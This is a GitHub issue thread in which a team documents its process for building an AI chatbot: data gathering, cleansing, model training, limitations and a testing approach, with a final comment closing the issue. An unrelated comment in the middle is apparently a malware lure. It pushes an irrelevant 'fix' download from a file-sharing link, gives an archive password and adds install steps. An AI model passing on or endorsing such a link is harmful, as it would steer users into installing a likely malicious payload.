### ISSUE TITLE
Document overall process of data gathering-cleansing- model training-integration to UI

### ISSUE THREAD

**Issue by DeeMcCart** [vinnieOrdobas/ci_national_ai#18]
EPIC:  #12 

As a **role** I can **capability** so that **received benefit**
As a **team member** I want to **clearly show which activity is being undertaken & where it fits into overall prcoess** to achieve **building a cohesive delivered solution, and (not missing some essential tasks along the way)**  

### Assumptions or Pre-Requisites:
* We have now (Tuesday 27/08) got a reasonable understanding of the process
* A LOT of work has been done, particularly by Sean & Val, on collating and prepping datasets
* Initial model training has been done (maybe twice) by Vinne

### Acceptance Criteria: (Must be completed before task is moved to 'Done')
- [x] Document describing what type of model and approach we are using (e.g if a chatbot, have we the ability to provide an overall context statement which describes style of conversation, preferred format of output etc?
- [x] Be clear on any limitations of the model (eg it is chatbot and will product text-only output/ spatial queries not fully supported/ charts not being produced)
- [x] Document (first pass) showing the proposed data grooming process
- [x] Outline how we plan to test the model (are we using a pre-prepared set of prompts/ user stories with 'expected result' to verify against?)

### Tasks

- [x] Task1 Create Descriptive diagram/ text showing Model approach & constraints
- [x] Task2 Document limitations of approach
- [x] Task3 Flowchart for data grooming process
- [ ] Task4 Document model testing approach
- [x] Task5 Revisit the other deliverables to ensure aligned with model testing approach

Before changing task status to 'Review' or 'Done' please provide comment (and screenprints if appropriate) as documentary evidence of task completion

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DeeMcCart** [comment]
DMcC 02/09/24
Documented in model training diagram 30/08/24 (and captured reasonably well in readme)
So moving this issue to Done

![Image](https://github.com/user-attachments/assets/2a8c020a-d1eb-420f-9646-9c3dfd0c5dba)
